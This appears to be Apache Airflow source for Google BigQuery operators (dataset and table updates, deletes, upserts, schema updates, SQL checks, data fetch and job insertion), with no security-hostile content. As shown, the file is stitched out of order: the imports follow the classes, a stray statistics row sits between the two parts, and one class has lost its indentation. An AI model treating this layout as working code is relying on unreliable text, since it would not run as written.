        accounts) to impersonate using short-term credentials. A string must be
        granted the Service Account Token Creator IAM role by the originating
        account; in a sequence each identity grants that role to the one before
        it, the first being granted by the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    :rtype: dataset
        https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
    """

    template_fields = (
        'dataset_id',
        'project_id',
        'impersonation_chain',
    )
    template_fields_renderers = {"dataset_resource": "json"}
    ui_color = BigQueryUIColors.DATASET.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        dataset_resource: dict,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        # Whole operator is deprecated; stacklevel=3 points at the DAG file.
        warnings.warn(
            "This operator is deprecated. Please use BigQueryUpdateDatasetOperator.",
            DeprecationWarning,
            stacklevel=3,
        )
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        self.dataset_id = dataset_id
        self.dataset_resource = dataset_resource
        self.project_id = project_id
        super().__init__(**kwargs)

    def execute(self, context):
        """Issue the PATCH request and return the patched dataset resource."""
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        patched = hook.patch_dataset(
            dataset_id=self.dataset_id,
            dataset_resource=self.dataset_resource,
            project_id=self.project_id,
        )
        return patched
class BigQueryUpdateTableOperator(BaseOperator):
    """
    Update a BigQuery table in place.

    ``fields`` selects which table properties to change; a field that is listed
    there but is ``None`` in the supplied resource is deleted from the table.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryUpdateTableOperator`

    :param dataset_id: The id of dataset. Don't need to provide,
        if datasetId in table_reference.
    :type dataset_id: str
    :param table_id: The id of table. Don't need to provide,
        if tableId in table_reference.
    :type table_id: str
    :param table_resource: Dataset resource that will be provided with request body.
        https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#resource
    :type table_resource: Dict[str, Any]
    :param fields: The fields of ``table`` to change, spelled as the Table
        properties (e.g. "friendly_name").
    :type fields: List[str]
    :param project_id: The name of the project where we want to create the table.
        Don't need to provide, if projectId in table_reference.
    :type project_id: str
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of
        authority, if any. The service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param impersonation_chain: Optional service account (or chained list of
        accounts) to impersonate using short-term credentials. A string must be
        granted the Service Account Token Creator IAM role by the originating
        account; in a sequence each identity grants that role to the one before
        it, the first being granted by the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    :rtype: table
        https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#resource
    """

    template_fields = (
        'dataset_id',
        'table_id',
        'project_id',
        'impersonation_chain',
    )
    template_fields_renderers = {"table_resource": "json"}
    ui_color = BigQueryUIColors.TABLE.value

    @apply_defaults
    def __init__(
        self,
        *,
        table_resource: Dict[str, Any],
        fields: Optional[List[str]] = None,
        dataset_id: Optional[str] = None,
        table_id: Optional[str] = None,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        # Connection settings.
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        # Target table and payload.
        self.project_id = project_id
        self.dataset_id = dataset_id
        self.table_id = table_id
        self.table_resource = table_resource
        self.fields = fields
        super().__init__(**kwargs)

    def execute(self, context):
        """Apply the partial table update and return the updated resource."""
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        updated = hook.update_table(
            table_resource=self.table_resource,
            fields=self.fields,
            dataset_id=self.dataset_id,
            table_id=self.table_id,
            project_id=self.project_id,
        )
        return updated
class BigQueryUpdateDatasetOperator(BaseOperator):
    """
    Update a BigQuery dataset in place.

    ``fields`` selects which dataset properties to change; a field that is
    listed there but is ``None`` in the supplied resource is deleted. When no
    ``fields`` are given, every key of ``dataset_resource`` is updated.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryUpdateDatasetOperator`

    :param dataset_id: The id of dataset. Don't need to provide,
        if datasetId in dataset_reference.
    :type dataset_id: str
    :param dataset_resource: Dataset resource that will be provided with request body.
        https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
    :type dataset_resource: Dict[str, Any]
    :param fields: The properties of dataset to change (e.g. "friendly_name").
    :type fields: Sequence[str]
    :param project_id: The name of the project where we want to create the dataset.
        Don't need to provide, if projectId in dataset_reference.
    :type project_id: str
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of
        authority, if any. The service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param impersonation_chain: Optional service account (or chained list of
        accounts) to impersonate using short-term credentials. A string must be
        granted the Service Account Token Creator IAM role by the originating
        account; in a sequence each identity grants that role to the one before
        it, the first being granted by the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    :rtype: dataset
        https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets#resource
    """

    template_fields = (
        'dataset_id',
        'project_id',
        'impersonation_chain',
    )
    template_fields_renderers = {"dataset_resource": "json"}
    ui_color = BigQueryUIColors.DATASET.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_resource: Dict[str, Any],
        fields: Optional[List[str]] = None,
        dataset_id: Optional[str] = None,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        # Connection settings.
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        # Target dataset and payload.
        self.project_id = project_id
        self.dataset_id = dataset_id
        self.dataset_resource = dataset_resource
        self.fields = fields
        super().__init__(**kwargs)

    def execute(self, context):
        """Apply the partial dataset update and return its API representation."""
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        # No explicit field list means "update everything present in the body".
        selected_fields = self.fields if self.fields else list(self.dataset_resource.keys())
        updated = hook.update_dataset(
            dataset_resource=self.dataset_resource,
            project_id=self.project_id,
            dataset_id=self.dataset_id,
            fields=selected_fields,
        )
        return updated.to_api_repr()
class BigQueryDeleteTableOperator(BaseOperator):
    """
    Delete a BigQuery table.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryDeleteTableOperator`

    :param deletion_dataset_table: A dotted
        ``(<project>.|<project>:)<dataset>.<table>`` that indicates which table
        will be deleted. (templated)
    :type deletion_dataset_table: str
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
        This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
    :type bigquery_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of
        authority, if any. The service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param ignore_if_missing: if True, then return success even if the
        requested table does not exist.
    :type ignore_if_missing: bool
    :param location: The location used for the operation.
    :type location: str
    :param impersonation_chain: Optional service account (or chained list of
        accounts) to impersonate using short-term credentials. A string must be
        granted the Service Account Token Creator IAM role by the originating
        account; in a sequence each identity grants that role to the one before
        it, the first being granted by the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """

    template_fields = (
        'deletion_dataset_table',
        'impersonation_chain',
    )
    ui_color = BigQueryUIColors.TABLE.value

    @apply_defaults
    def __init__(
        self,
        *,
        deletion_dataset_table: str,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        delegate_to: Optional[str] = None,
        ignore_if_missing: bool = False,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        # Deprecated alias: bigquery_conn_id, when given, wins over gcp_conn_id.
        if bigquery_conn_id:
            warnings.warn(
                "The bigquery_conn_id parameter has been deprecated. You should pass "
                "the gcp_conn_id parameter.",
                DeprecationWarning,
                stacklevel=3,
            )
            gcp_conn_id = bigquery_conn_id
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.location = location
        self.impersonation_chain = impersonation_chain
        self.deletion_dataset_table = deletion_dataset_table
        self.ignore_if_missing = ignore_if_missing

    def execute(self, context) -> None:
        """Delete the target table; missing tables are tolerated when configured."""
        self.log.info('Deleting: %s', self.deletion_dataset_table)
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            location=self.location,
            impersonation_chain=self.impersonation_chain,
        )
        hook.delete_table(table_id=self.deletion_dataset_table, not_found_ok=self.ignore_if_missing)
class BigQueryUpsertTableOperator(BaseOperator):
    """
    Upsert BigQuery table

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryUpsertTableOperator`

    :param dataset_id: A dotted
        ``(<project>.|<project>:)<dataset>`` that indicates which dataset
        will be updated. (templated)
    :type dataset_id: str
    :param table_resource: a table resource. see
        https://cloud.google.com/bigquery/docs/reference/v2/tables#resource
    :type table_resource: dict
    :param project_id: The name of the project where we want to update the dataset.
        Don't need to provide, if projectId in dataset_reference.
    :type project_id: str
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
        This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
    :type bigquery_conn_id: str
    :param delegate_to: The account to impersonate, if any.
        For this to work, the service account making the request must have domain-wide
        delegation enabled.
    :type delegate_to: str
    :param location: The location used for the operation.
    :type location: str
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """

    template_fields = (
        'dataset_id',
        'table_resource',
        'impersonation_chain',
    )
    template_fields_renderers = {"table_resource": "json"}
    ui_color = BigQueryUIColors.TABLE.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        table_resource: dict,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        delegate_to: Optional[str] = None,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        # Deprecated alias: bigquery_conn_id, when given, wins over gcp_conn_id.
        if bigquery_conn_id:
            warnings.warn(
                "The bigquery_conn_id parameter has been deprecated. You should pass "
                "the gcp_conn_id parameter.",
                DeprecationWarning,
                stacklevel=3,
            )
            gcp_conn_id = bigquery_conn_id
        self.dataset_id = dataset_id
        self.table_resource = table_resource
        self.project_id = project_id
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.location = location
        self.impersonation_chain = impersonation_chain

    def execute(self, context) -> None:
        """Insert the table if it does not exist, otherwise update it in place."""
        self.log.info('Upserting Dataset: %s with table_resource: %s', self.dataset_id, self.table_resource)
        # Fix: pass the connection id via the current ``gcp_conn_id`` keyword.
        # The previous ``bigquery_conn_id=`` keyword is deprecated on
        # BigQueryHook and triggered a spurious DeprecationWarning at runtime,
        # unlike every sibling operator in this module.
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            location=self.location,
            impersonation_chain=self.impersonation_chain,
        )
        hook.run_table_upsert(
            dataset_id=self.dataset_id,
            table_resource=self.table_resource,
            project_id=self.project_id,
        )
class BigQueryUpdateTableSchemaOperator(BaseOperator):
    """
    Update BigQuery Table Schema
    Updates fields on a table schema based on contents of the supplied schema_fields_updates
    parameter. The supplied schema does not need to be complete, if the field
    already exists in the schema you only need to supply keys & values for the
    items you want to patch, just ensure the "name" key is set.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryUpdateTableSchemaOperator`

    :param schema_fields_updates: a partial schema resource. see
        https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#TableSchema

        **Example**: ::

            schema_fields_updates=[
                {"name": "emp_name", "description": "Some New Description"},
                {"name": "salary", "policyTags": {'names': ['some_new_policy_tag']},},
                {"name": "departments", "fields": [
                    {"name": "name", "description": "Some New Description"},
                    {"name": "type", "description": "Some New Description"}
                ]},
            ]

    :type schema_fields_updates: List[dict]
    :param include_policy_tags: (Optional) If set to True policy tags will be included in
        the update request which requires special permissions even if unchanged (default False)
        see https://cloud.google.com/bigquery/docs/column-level-security#roles
    :type include_policy_tags: bool
    :param dataset_id: A dotted
        ``(<project>.|<project>:)<dataset>`` that indicates which dataset
        will be updated. (templated)
    :type dataset_id: str
    :param table_id: The table ID of the requested table. (templated)
    :type table_id: str
    :param project_id: The name of the project where we want to update the dataset.
        Don't need to provide, if projectId in dataset_reference.
    :type project_id: str
    :param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
    :type gcp_conn_id: str
    :param delegate_to: The account to impersonate, if any.
        For this to work, the service account making the request must have domain-wide
        delegation enabled.
    :type delegate_to: str
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """

    # NOTE(review): removed the documented ``bigquery_conn_id`` and ``location``
    # parameters from the docstring above — the constructor below does not
    # accept either, so documenting them was misleading.

    template_fields = (
        'schema_fields_updates',
        'dataset_id',
        'table_id',
        'project_id',
        'impersonation_chain',
    )
    template_fields_renderers = {"schema_fields_updates": "json"}
    ui_color = BigQueryUIColors.TABLE.value

    @apply_defaults
    def __init__(
        self,
        *,
        schema_fields_updates: List[Dict[str, Any]],
        include_policy_tags: Optional[bool] = False,
        dataset_id: Optional[str] = None,
        table_id: Optional[str] = None,
        project_id: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        self.schema_fields_updates = schema_fields_updates
        self.include_policy_tags = include_policy_tags
        self.table_id = table_id
        self.dataset_id = dataset_id
        self.project_id = project_id
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain
        super().__init__(**kwargs)

    def execute(self, context):
        """Merge the partial schema updates into the table and return the result."""
        bq_hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        return bq_hook.update_table_schema(
            schema_fields_updates=self.schema_fields_updates,
            include_policy_tags=self.include_policy_tags,
            dataset_id=self.dataset_id,
            table_id=self.table_id,
            project_id=self.project_id,
        )
# pylint: disable=too-many-arguments
class BigQueryInsertJobOperator(BaseOperator):
"""
Executes a BigQuery job. Waits for the job to complete and returns job id.
This operator work in the following way:
- it calculates a unique hash of the job using job's configuration or uuid if ``force_rerun`` is True
- creates ``job_id`` in form of
``[provided_job_id | airflow_{dag_id}_{task_id}_{exec_date}]_{uniqueness_suffix}``
- submits a BigQuery job using the ``job_id``
- if job with given id already exists then it tries to reattach to the job if its not done and its
state is in ``reattach_states``. If the job is done the operator will raise ``AirflowException``.
Using ``force_rerun`` will submit a new job every time without attaching to already existing ones.
For job definition see here:
https://cloud.google.com/bigquery/docs/reference/v2/jobs
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryInsertJobOperator`
:param configuration: The configuration parameter maps directly to BigQuery's
configuration field in the job object. For more details see
https://cloud.google.com/bigquery/docs/reference/v2/jobs
:type configuration: Dict[str, Any]
:param job_id: The ID of the job. It will be suffixed with hash of job configuration
unless ``force_rerun`` is True.
The ID must contain only letters (a-z, A-Z), numbers (0-9), underscores (_), or
dashes (-). The maximum length is 1,024 characters. If not provided then uuid will
be generated.
:type job_id: str
:param force_rerun: If True then operator will use hash of uuid as job id suffix
:type force_rerun: bool
:param reattach_states: Set of BigQuery job's states in case of which we should reattach
to the job. Should be other than final states.
:param project_id: Google Cloud Project where the job is running
:type project_id: str
:param location: location the job is running
:type location: str
:param gcp_conn_id: The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
:param cancel_on_kill: Flag which indicates whether cancel the hook's job or not, when on_kill is called
:type cancel_on_kill: bool
"""
template_fields = (
"configuration",
"job_id",
"impersonation_chain",
)
template_ext = (".json",)
template_fields_renderers = {"configuration": "json"}
ui_color = BigQueryUIColors.QUERY.value
@apply_defaults
def __init__(
self,
configuration: Dict[str, Any],
project_id: Optional[str] = None,
location: Optional[str] = None,
job_id: Optional[str] = None,
force_rerun: bool = True,
reattach_states: Optional[Set[str]] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
cancel_on_kill: bool = True,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.configuration = configuration
self.location = location
self.job_id = job_id
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.force_rerun = force_rerun
self.reattach_states: Set[str] = reattach_states or set()
self.impersonation_chain = impersonation_chain
self.cancel_on_kill = cancel_on_kill
self.hook: Optional[BigQueryHook] = None
def prepare_template(self) -> None:
# If .json is passed then we have to read the file
if isinstance(self.configuration, str) and self.configuration.endswith('.json'):
with open(self.configuration) as file:
self.configuration = json.loads(file.read())
def _submit_job(
self,
hook: BigQueryHook,
job_id: str,
) -> BigQueryJob:
# Submit a new job
job = hook.insert_job(
configuration=self.configuration,
project_id=self.project_id,
location=self.location,
job_id=job_id,
)
# Start the job and wait for it to complete and get the result.
job.result()
return job
@staticmethod
def _handle_job_error(job: BigQueryJob) -> None:
if job.error_result:
raise AirflowException(f"BigQuery job {job.job_id} failed: {job.error_result}")
def _job_id(self, context):
if self.force_rerun:
hash_base = str(uuid.uuid4())
else:
hash_base = json.dumps(self.configuration, sort_keys=True)
uniqueness_suffix = hashlib.md5(hash_base.encode()).hexdigest()
if self.job_id:
return f"{self.job_id}_{uniqueness_suffix}"
exec_date = context['execution_date'].isoformat()
job_id = f"airflow_{self.dag_id}_{self.task_id}_{exec_date}_{uniqueness_suffix}"
return re.sub(r"[:\-+.]", "_", job_id)
def execute(self, context: Any):
hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.hook = hook
job_id = self._job_id(context)
try:
job = self._submit_job(hook, job_id)
self._handle_job_error(job)
except Conflict:
# If the job already exists retrieve it
job = hook.get_job(
project_id=self.project_id,
location=self.location,
job_id=job_id,
)
if job.state in self.reattach_states:
# We are reattaching to a job
job.result()
self._handle_job_error(job)
else:
# Same job configuration so we need force_rerun
raise AirflowException(
f"Job with id: {job_id} already exists and is in {job.state} state. If you "
f"want to force rerun it consider setting `force_rerun=True`."
f"Or, if you want to reattach in this scenario add {job.state} to `reattach_states`"
)
self.job_id = job.job_id
return job.job_id
def on_kill(self) -> None:
if self.job_id and self.cancel_on_kill:
self.hook.cancel_job( # type: ignore[union-attr]
job_id=self.job_id, project_id=self.project_id, location=self.location
)
| 42.520566 | 109 | 0.669357 |
import enum
import hashlib
import json
import re
import uuid
import warnings
from datetime import datetime
from typing import Any, Dict, Iterable, List, Optional, Sequence, Set, SupportsAbs, Union
import attr
from google.api_core.exceptions import Conflict
from google.cloud.bigquery import TableReference
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator, BaseOperatorLink
from airflow.models.taskinstance import TaskInstance
from airflow.operators.sql import SQLCheckOperator, SQLIntervalCheckOperator, SQLValueCheckOperator
from airflow.providers.google.cloud.hooks.bigquery import BigQueryHook, BigQueryJob
from airflow.providers.google.cloud.hooks.gcs import GCSHook, _parse_gcs_url
from airflow.utils.decorators import apply_defaults
# Template for deep links to a job in the BigQuery console UI.
BIGQUERY_JOB_DETAILS_LINK_FMT = "https://console.cloud.google.com/bigquery?j={job_id}"
# Shared warning text for the deprecated ``bigquery_conn_id`` parameter.
_DEPRECATION_MSG = (
    "The bigquery_conn_id parameter has been deprecated. You should pass the gcp_conn_id parameter."
)
class BigQueryUIColors(enum.Enum):
    """Hex colors used as ``ui_color`` by the BigQuery operators below."""

    CHECK = "#C0D7FF"  # check/validation operators
    QUERY = "#A1BBFF"  # query/job operators
    TABLE = "#81A0FF"  # table-level operators
    DATASET = "#5F86FF"  # dataset-level operators
class BigQueryConsoleLink(BaseOperatorLink):
    """Operator extra link pointing at the job in the Google BigQuery console."""

    name = 'BigQuery Console'

    def get_link(self, operator, dttm):
        """Return the console URL for the job id stored in XCom, or '' if absent."""
        task_instance = TaskInstance(task=operator, execution_date=dttm)
        job_id = task_instance.xcom_pull(task_ids=operator.task_id, key='job_id')
        if not job_id:
            return ''
        return BIGQUERY_JOB_DETAILS_LINK_FMT.format(job_id=job_id)
@attr.s(auto_attribs=True)
class BigQueryConsoleIndexableLink(BaseOperatorLink):
    """Extra link for the ``index``-th job of an operator that ran several queries."""

    index: int = attr.ib()

    @property
    def name(self) -> str:
        """Human-readable link name (1-based for display)."""
        return f'BigQuery Console #{self.index + 1}'

    def get_link(self, operator: BaseOperator, dttm: datetime):
        """Return the console URL for the ``index``-th job id in XCom, or None."""
        ti = TaskInstance(task=operator, execution_date=dttm)
        job_ids = ti.xcom_pull(task_ids=operator.task_id, key='job_id')
        if not job_ids:
            return None
        # Bug fix: the original guard `len(job_ids) < self.index` let
        # index == len(job_ids) through, raising IndexError on the lookup below.
        if self.index >= len(job_ids):
            return None
        job_id = job_ids[self.index]
        return BIGQUERY_JOB_DETAILS_LINK_FMT.format(job_id=job_id)
class _BigQueryDbHookMixin:
    # Mixin used by the SQL-check operators below; assumes the host class sets
    # gcp_conn_id, use_legacy_sql, location, impersonation_chain and labels in __init__.
    def get_db_hook(self) -> BigQueryHook:
        """Build a BigQueryHook configured from this operator's attributes."""
        return BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            use_legacy_sql=self.use_legacy_sql,
            location=self.location,
            impersonation_chain=self.impersonation_chain,
            labels=self.labels,
        )
class BigQueryCheckOperator(_BigQueryDbHookMixin, SQLCheckOperator):
    """Run a SQL check against BigQuery via ``SQLCheckOperator`` semantics."""

    template_fields = ('sql', 'gcp_conn_id', 'impersonation_chain', 'labels')
    template_ext = ('.sql',)
    ui_color = BigQueryUIColors.CHECK.value

    @apply_defaults
    def __init__(
        self,
        *,
        sql: str,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        use_legacy_sql: bool = True,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        labels: Optional[dict] = None,
        **kwargs,
    ) -> None:
        """Store hook configuration; honour the deprecated connection alias."""
        super().__init__(sql=sql, **kwargs)
        if bigquery_conn_id:
            # Deprecated alias wins if provided, with a warning.
            warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
            gcp_conn_id = bigquery_conn_id
        self.sql = sql
        self.gcp_conn_id = gcp_conn_id
        self.use_legacy_sql = use_legacy_sql
        self.location = location
        self.labels = labels
        self.impersonation_chain = impersonation_chain
class BigQueryValueCheckOperator(_BigQueryDbHookMixin, SQLValueCheckOperator):
    """Compare the result of a BigQuery query against an expected ``pass_value``."""

    template_fields = ('sql', 'gcp_conn_id', 'pass_value', 'impersonation_chain', 'labels')
    template_ext = ('.sql',)
    ui_color = BigQueryUIColors.CHECK.value

    @apply_defaults
    def __init__(
        self,
        *,
        sql: str,
        pass_value: Any,
        tolerance: Any = None,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        use_legacy_sql: bool = True,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        labels: Optional[dict] = None,
        **kwargs,
    ) -> None:
        """Store hook configuration; honour the deprecated connection alias."""
        super().__init__(sql=sql, pass_value=pass_value, tolerance=tolerance, **kwargs)
        if bigquery_conn_id:
            # Deprecated alias wins if provided, with a warning.
            warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
            gcp_conn_id = bigquery_conn_id
        self.gcp_conn_id = gcp_conn_id
        self.use_legacy_sql = use_legacy_sql
        self.location = location
        self.labels = labels
        self.impersonation_chain = impersonation_chain
class BigQueryIntervalCheckOperator(_BigQueryDbHookMixin, SQLIntervalCheckOperator):
    """Check metrics of today's partition against the partition ``days_back`` ago."""

    template_fields = ('table', 'gcp_conn_id', 'sql1', 'sql2', 'impersonation_chain', 'labels')
    ui_color = BigQueryUIColors.CHECK.value

    @apply_defaults
    def __init__(
        self,
        *,
        table: str,
        metrics_thresholds: dict,
        date_filter_column: str = 'ds',
        days_back: SupportsAbs[int] = -7,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        use_legacy_sql: bool = True,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        labels: Optional[Dict] = None,
        **kwargs,
    ) -> None:
        """Store hook configuration; honour the deprecated connection alias."""
        super().__init__(
            table=table,
            metrics_thresholds=metrics_thresholds,
            date_filter_column=date_filter_column,
            days_back=days_back,
            **kwargs,
        )
        if bigquery_conn_id:
            # Deprecated alias wins if provided, with a warning.
            warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
            gcp_conn_id = bigquery_conn_id
        self.gcp_conn_id = gcp_conn_id
        self.use_legacy_sql = use_legacy_sql
        self.location = location
        self.labels = labels
        self.impersonation_chain = impersonation_chain
class BigQueryGetDataOperator(BaseOperator):
    """
    Fetch data from a BigQuery table and return it as a list of row value tuples.

    :param dataset_id: The dataset housing the table.
    :param table_id: The table to read.
    :param max_results: Maximum number of rows to return (default 100).
    :param selected_fields: Comma-separated column subset; all columns if None.
    :param gcp_conn_id: The connection ID used to connect to Google Cloud.
    :param bigquery_conn_id: (deprecated) alias for ``gcp_conn_id``.
    :param delegate_to: Account to impersonate via domain-wide delegation, if any.
    :param location: Location of the BigQuery table/job.
    :param impersonation_chain: Optional service account(s) to impersonate using
        short-term credentials.
    """

    template_fields = (
        'dataset_id',
        'table_id',
        'max_results',
        'selected_fields',
        'impersonation_chain',
    )
    ui_color = BigQueryUIColors.QUERY.value

    @apply_defaults
    def __init__(
        self,
        *,
        dataset_id: str,
        table_id: str,
        max_results: int = 100,
        selected_fields: Optional[str] = None,
        gcp_conn_id: str = 'google_cloud_default',
        bigquery_conn_id: Optional[str] = None,
        delegate_to: Optional[str] = None,
        location: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        if bigquery_conn_id:
            warnings.warn(
                "The bigquery_conn_id parameter has been deprecated. You should pass "
                "the gcp_conn_id parameter.",
                DeprecationWarning,
                stacklevel=3,
            )
            gcp_conn_id = bigquery_conn_id
        self.dataset_id = dataset_id
        self.table_id = table_id
        # Coerce so a templated string value also works.
        self.max_results = int(max_results)
        self.selected_fields = selected_fields
        self.gcp_conn_id = gcp_conn_id
        self.delegate_to = delegate_to
        self.location = location
        self.impersonation_chain = impersonation_chain

    def execute(self, context) -> list:
        """Read up to ``max_results`` rows and return them as value tuples."""
        self.log.info(
            'Fetching Data from %s.%s max results: %s', self.dataset_id, self.table_id, self.max_results
        )
        # Fix: pass the connection id via ``gcp_conn_id`` as every other operator in
        # this module does; the ``bigquery_conn_id=`` keyword is the deprecated alias.
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        rows = hook.list_rows(
            dataset_id=self.dataset_id,
            table_id=self.table_id,
            max_results=self.max_results,
            selected_fields=self.selected_fields,
            location=self.location,
        )
        self.log.info('Total extracted rows: %s', len(rows))
        return [row.values() for row in rows]
class BigQueryExecuteQueryOperator(BaseOperator):
    """
    Executes BigQuery SQL queries in a specific BigQuery database.

    Deprecated: please use ``BigQueryInsertJobOperator`` instead.

    :param sql: the SQL statement (or reference to a ``.sql`` template file) to
        execute, or an iterable of such statements executed sequentially.
